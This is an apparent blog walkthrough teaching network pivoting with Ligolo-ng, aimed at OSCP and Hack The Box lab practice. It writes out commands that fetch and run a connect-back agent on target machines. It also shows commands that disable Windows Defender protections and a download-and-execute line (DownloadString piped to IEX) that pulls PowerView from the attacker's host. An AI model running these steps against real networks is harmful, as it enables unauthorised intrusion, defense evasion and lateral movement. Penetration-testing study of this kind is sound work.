How to Tunnel and Pivot Networks using Ligolo-ng
On my journey to take on the OSCP I learned that pivoting/tunneling can be a confusing concept at first for beginners. After doing extensive research I came across an awesome easy to use tool called Ligolo-ng. Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
To follow this walkthrough or do some practicing I would recommend signing up with Hack The Box Pro labs. The pro labs have a lot of pivoting/tunneling involved that will help boost your comfort with these concepts and get you ready to take on the OSCP or real world pen tests.
Note: If you are a visual learner I would recommend this YouTube video I found very helpful :)
Step 1:
To start off you will need to download the agent and proxy files from the ligolo-ng releases page on github. The agent and proxy will depend on what system you are on and the system you are targeting. The agent will be ran on the target machine and the proxy tool will be ran on your machine.
Agent- Target machine
Proxy- Attacker machine (Yours)
You can download them manually from the web interface or just grab them with the wget command in the current working directory you are in. I like to put all tools in my /opt directory with a designated folder for the tools.
cd /opt
mkdir ligolo
cd ligoloAgent File:
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gzProxy File:
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gzNow we need to unpack these files with the following commands and I recommend renaming them to the specific system you are going to use them on.
tar -xvf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
sudo mv proxy lin-proxy
sudo mv agent lin-agentStep 2:
There are some prerequisite commands we need to run before launching ligolo. These commands create a tun interface on the Proxy Server (C2).
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo upOn your machine get ligolo running:
./lin-proxy -selfcert -laddr 0.0.0.0:443 Note: You can chose any port to listen on. I chose 443 because this port is known by most firewalls and wont get flagged.
In another window once the above commands are all followed we need to push the agent file onto the target machine. You can accomplish this by running a python web server in the directory where the agent file resides.
sudo python -m http.server 80Grab the agent file from the attacker machine using wget.
Run these commands on the Target Machine:
wget http://<your attacker machine IP here>/lin-agent
chmod +x lin-agent
./lin-agent -connect <attacker IP here>:443 -ignore-cert
You should see the connection get grabbed by the ligolo tool if the commands were ran successfully on target machine. You can manage your tunneled sessions in the tool by typing session in the above example screenshot and you can toggle between them once more are established. \
Step 3:
On the target machine if you enumerated you can discover other network interfaces the machine is interacting with or established connections to other internal IP’s. This will help us pivot to other networks and continue our attacks.
Run the following commands to discover other networks the machine is interacting with:
Linux Machine:
netstat -an
ip route
ifconfig
Now that we have the target network we want to pivot to in order to reach the other hosts and attack them lets add them to ligolo routes and start them.
On Attacker machine run:
sudo ip route add 192.168.110.0/24 dev ligolo
Now you should be able to reach those other IP’s and perform attacks ;)
Step 4 (Next Pivot):
Let’s say we get a hold of a domain controller from carrying out our attacks from that subnet we pivoted to, and we notice now that this host is on Windows and is also communicating with another subnet after doing some enumeration. You can use some commands to enumerate and utilize powerview or winPEAS.
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows “net *” commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
Windows Machine:
netstat -an | findstr "192.168."Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true(New-Object System.Net.WebClient).DownloadString(‘http://<your IP Here>/powerview.ps1') | IEXGet-NetForestTrustWe notice that a new subnet is being interacted with and new domain discovery after doing the above enumeration techniques.
Download the windows agent that matches your targets architecture in my case its 64-bit and then push it onto the machine the same way we did above but this time slightly different steps since this is a windows machine..
On your attacker machine:
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Windows_64bit.zipYou might already have your python web server still running from before so make sure you have the same file in the directory you are serving from.
sudo python -m http.server 80On the Windows machine:
certutil.exe -urlcache -split -f "http://<Your IP Here>:80/win-agent.exe"
Now lets establish a connection with the agent:
./win-agent.exe -connect <your IP here>:443 -ignore-certYou should see two sessions available now when running the session command in ligolo.
Now that we know the next IP route lets add it to ligolo and start it.
On your linux machine:
sudo ip route add 192.168.210.0/24 dev ligoloYou should see the following if command was added correctly..
Go back to your ligolo interface running and type session and select the machine with the new tunnel and type start. It will ask you if you want to switch tunnels just select yes..
You should now have learned how to pivot to two different networks. This process will be rinsed and repeated when seeing other machines on the network communicating to other subnets. You will push the agent file on the machine that is communicating with another network or domain and have it connect back to the ligolo interface then route that IP subnet with ligolo and type start.
I hope you found this walkthrough helpful please share with others and ensure to follow and comment if you have any questions!
